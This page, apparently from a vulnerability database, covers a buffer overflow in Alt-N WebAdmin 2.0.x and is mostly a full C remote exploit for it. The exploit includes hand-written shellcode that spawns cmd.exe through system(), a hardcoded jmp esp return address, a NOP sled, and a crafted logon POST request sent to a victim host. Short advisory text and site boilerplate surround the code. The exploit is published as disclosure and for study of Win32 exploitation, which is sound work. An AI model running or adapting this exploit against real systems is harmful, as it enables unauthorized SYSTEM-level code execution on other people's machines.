Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Alt-N WebAdmin 2.0.x USER Parameter Buffer Overflow Vulnerability (1)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 8 Views

Alt-N WebAdmin 2.0.x USER Parameter Buffer Overflow Vulnerabilit

Code

                                                source: http://www.securityfocus.com/bid/8024/info

Alt-N WebAdmin is prone to a buffer overflow condition. This is due to insufficient bounds checking on the USER parameter. Successful exploitation could result in code execution with SYSTEM level privileges.

/* WebAdmin.dll remote proof of concept 2.0.4 version.. tried finding 2.0.5 but all versions
were already patched from the dl sites... this was tested on a win2ksp2 server, i suggest
using better shellcode this is just something i know works, just opens a cmd.exe prompt
on the victim box. I imagine this won't be too much harder to exploit with 2.0.5 unpatched
this took me about 1 hour to write and it was my first remote win32 exploit, thank you alt-n :D.
word to Mark Litchfield for finding this, i suggest anyone who is interested in learning win32
exploitation download this and attempt to exploit it, it's easier than you think.
shouts to innercircle you little kittens you....
-wire */
#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib "ws2_32");
char sc[] = 
					 "\x55"					// push ebp
					 "\x8b\xec"				// mov ebp, esp
					 "\x53"					// push ebx
					 "\x56"					// push esi
					 "\x57"					// push edi
					 "\x8b\xe5"				// mov esp, ebp				
					 "\x55"					// push ebp
					 "\x8b\xec"				// mov ebp, esp
					 "\x33\xff"				// xor edi,edi
					 "\x57"					// push edi
					 "\x57"					// push edi
					 "\xc6\x45\xf8\x6d"			// mov byte ptr ss:[ebp-8],6d
					 "\xc6\x45\xf9\x73"			// mov byte ptr ss:[ebp-7],73
					 "\xc6\x45\xfa\x76"			// mov byte ptr ss:[ebp-6],76
					 "\xc6\x45\xfb\x63"			// mov byte ptr ss:[ebp-5],63
					 "\xc6\x45\xfc\x72"			// mov byte ptr ss:[ebp-4],72
					 "\xc6\x45\xfd\x74"			// mov byte ptr ss:[ebp-3],74
					 "\xb8\x54\xa2\xe8\x77" 		// mov eax,kernel32.loadlibraryA;
					 "\x50"					// push eax
					 "\x8d\x45\xf8"				// lea eax, dword ptr ss:[ebp-8]
					 "\x50"					// push eax
					 "\xff\x55\xf4"				// call dword ptr ss:[ebp-c]
					 "\x58"					// pop eax
					 "\x58"					// pop eax
					 "\x58"					// pop eax
					 "\x33\xc0"				// xor eax,eax
					 "\x50"					// push eax
					 "\x50"					// push eax
					 "\xc6\x45\xf8\x63"			// mov byte ptr ss:[ebp-8],63
					 "\xc6\x45\xf9\x6d"			// mov byte ptr ss:[ebp-7],6d
					 "\xc6\x45\xfa\x64"			// mov byte ptr ss:[ebp-6],64
					 "\xc6\x45\xfb\x2e"			// mov byte ptr ss:[ebp-5],2e
					 "\xc6\x45\xfc\x65"			// mov byte ptr ss:[ebp-4],65
					 "\xc6\x45\xfd\x78"			// mov byte ptr ss:[ebp-3],78
					 "\xc6\x45\xfe\x65"			// mov byte ptr ss:[ebp-2],65
					 "\xb8\x4a\x9B\x01\x78"			// mov eax, 78019b4a;system() from msvcrt win2ksp2
					 "\x50"					// push eax
					 "\x8d\x45\xf8"				// lea eax, dword ptr ss:[ebp-8]
					 "\x50"					// push eax
					 "\xff\x55\xf4"				// call dword ptr ss:[ebp-c]
					 "\x83\xc4\x04"				// add esp, 04h
					 "\x5c"					// pop esp
					 "\xc3";				// ret			we're done!



struct sockaddr_in victim;
int main(int argc, char **argv) {
	SOCKET s;
	WSADATA wsadata;
	int x;
	DWORD jmpesp = 0x1005d58d; // jmp esp from 2.0.4 webAdmin.dll...
	char exp_buf[5000];
	char boom[] = 
		"POST /WebAdmin.dll?View=Logon HTTP/1.1\r\n"
		"Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"
		"Accept-Language: en-us\r\n"
		"Content-Type: application/x-www-form-urlencoded\r\n"
		"Accept-Encoding: gzip, deflate\r\n"
		"User-Agent: Your Mom\r\n"
		"Host: sh0dan.org\r\n"
		"Content-Length: 395\r\n"
		"Connection: Keep-Alive\r\n"
		"Cache-Control: no-cache\r\n"
		"Cookie: User=test; Lang=en; Theme=Standard\r\n\r\nUser=";
	char o_args[] = 
		"&Password=foo&languageselect=en&Theme=Heavy&Logon=Sign+In\r\n\r\n";
	
    if (argc != 3) {
		fprintf(stderr, "WebAdmin from Alt-N 2.0.4 Remote Exploit Proof Of Concept\n");
		fprintf(stderr, "Werd to Mark Litchfield for finding this easily exploited hole\n");
		fprintf(stderr, "Usage: %s <victim> <port>\n", argv[0]);
		exit(1);
	}

	WSAStartup(MAKEWORD(2,0),&wsadata);
	victim.sin_port = htons(atoi(argv[2]));
	victim.sin_addr.s_addr = inet_addr(argv[1]);
	victim.sin_family = AF_INET;

	memset(exp_buf, 0x90, 5000);
	x = strlen(boom);
	strncpy(exp_buf, boom, x);
	x += 168;

	memcpy(exp_buf+x, &jmpesp, 4);
	x += 4;
	memcpy(exp_buf+x, sc, strlen(sc));
	x += strlen(sc);
	memcpy(exp_buf+x, o_args, strlen(o_args));
	x += strlen(o_args);
	exp_buf[x+1] = 0x00;

	s = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
	connect(s, (struct sockaddr *)&victim, sizeof(victim));
	send(s, exp_buf, x, 0);
    
	printf("booyah");
	return(0);
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
buffer overflowinsufficient bounds checkingcode executionsystem level privilegeswebadmin.dllwin2ksp2shellcodeexploitexploitationremotevulnerabilitywinsockwin32ws2_32kernel32loadlibraryamsvcrtsystemvictim boxsecurityfocus.
8